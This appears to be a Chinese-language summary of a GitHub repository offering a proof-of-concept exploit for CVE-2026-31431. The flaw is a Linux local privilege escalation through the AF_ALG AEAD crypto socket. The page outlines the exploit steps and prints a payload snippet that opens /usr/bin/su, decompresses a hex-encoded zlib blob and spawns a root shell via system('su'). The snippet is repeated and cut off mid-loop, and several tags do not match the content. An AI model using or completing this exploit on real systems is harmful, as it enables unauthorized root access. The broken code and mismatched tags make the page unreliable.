AdityaBhatt3010/CVE-2026-31431
GitHub: AdityaBhatt3010/CVE-2026-31431
Linux 内核 AF_ALG 加密接口中 AEAD socket 处理不当导致的本地权限提升漏洞(CVE-2026-31431)的概念验证代码。
Stars: 3 | Forks: 0
## 📌 CVE-2026-31431 – 通过 AEAD Crypto Socket 滥用实现权限提升
### 🧠 概述
CVE-2026-31431 是一个 Linux 权限提升漏洞,滥用了 **AF_ALG (kernel crypto API)** 接口。通过与 AEAD (Authenticated Encryption with Associated Data) socket 进行恶意交互,攻击者可以提升权限并以 root 身份执行代码。
该漏洞利用了对加密 socket 操作的不当处理,允许进行可控的内存操作并最终实现权限提升。
### ⚠️ 影响
* 本地权限提升
* 获取 Root shell 访问权限 (`/usr/bin/su`)
* 影响存在易受攻击的 kernel crypto 实现的系统
### 🔍 技术分析
该漏洞利用:
* 创建一个 **AF_ALG socket**
* 绑定到:
authenc(hmac(sha256),cbc(aes))
* 通过 `setsockopt` 和 `sendmsg` 使用精心构造的 payload
* 触发非预期的内核行为
* 通过以下指令降级到 root shell:
g.system("su")
关键指标:
* 使用 `socket(38,5,0)` → AF_ALG
* AEAD 操纵
* 通过压缩的 payload (`zlib`) 实现可控的内存写入
### 💻 概念验证
#### 🔑 核心 Payload 代码片段: **免责声明:我不拥有此 PoC 的所有权。它仅用于教育目的,仅在已获得许可的环境中进行测试。作者/所有者不对任何滥用行为负责。 ** ``` f=g.open("/usr/bin/su",0) i=0 e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3")) while i
#### 🔑 核心 Payload 代码片段: **免责声明:我不拥有此 PoC 的所有权。它仅用于教育目的,仅在已获得许可的环境中进行测试。作者/所有者不对任何滥用行为负责。 ** ``` f=g.open("/usr/bin/su",0) i=0 e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3")) while i
标签:0day, 0day挖掘, AEAD, AF_ALG, Crypto API, CVE-2026-31431, Nday, PoC, Root提权, sendmsg, setsockopt, socket编程, Web报告查看器, zlib压缩, 内存破坏, 内核安全, 内核漏洞, 协议分析, 子域名枚举, 安全渗透, 提权漏洞, 数据展示, 暴力破解, 本地提权, 权限提升, 漏洞分析, 漏洞复现, 系统安全, 红队, 网络安全, 路径探测, 逆向工具, 隐私保护